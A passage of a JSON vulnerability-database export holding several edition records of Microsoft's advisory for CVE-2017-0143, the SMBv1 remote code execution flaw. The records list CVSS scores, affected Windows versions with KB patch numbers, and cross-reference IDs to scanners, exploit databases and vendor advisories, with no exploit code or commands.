"KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 
2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T08:49:10", "differentElements": ["msAffectedSoftware"], "edition": 12}, {"bulletin": {"id": 
"MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-05T18:46:16", "history": [], "viewCount": 9, 
"enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:43C3E019D454987EF522E299C31E9D3F"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "zdt", "idList": ["1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "openvas", "idList": 
["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "kaspersky", "idList": ["KLA10977", "KLA11902", "KLA10979"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-05T18:46:16", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-05T18:46:16", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4012214", "KB3210720", "KB3210721", "KB3212646", "KB4013198", "KB4013429", "KB4012217", "KBMS16-110, 3187754", "KB4012216", "KB3205401", "KB4012212", "KB4012606", "KB4012598", "KB3205409", "KB4012215", "KB3177186", "KB4012213", "KB3213986"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": 
""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows 
Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", 
"kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", 
"msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": 
"KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T18:46:16", "differentElements": ["msAffectedSoftware"], "edition": 13}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. 
An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-05T20:48:26", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": 
"talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142548", "PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142181"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27613", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987", "EDB-ID:43970"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", 
"RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "nessus", "idList": ["SMB_NT_MS17-010.NASL", "700099.PRM", "700059.PRM", "MS17-010.NASL"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-05T20:48:26", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-05T20:48:26", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB4013198", "KB4013429", "KB3210720", "KB4012215", "KB3213986", "KB4012217", "KB4012598", "KB3205409", "KB3177186", "KB4012606", "KB4012214", "KB4012212", "KB3210721", "KB4012216", "KB3205401", "KB3212646", "KB4012213", "KBMS16-110, 3187754"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 
R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 
2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-05T20:48:26", "differentElements": ["msAffectedSoftware"], "edition": 14}, {"bulletin": {"id": 
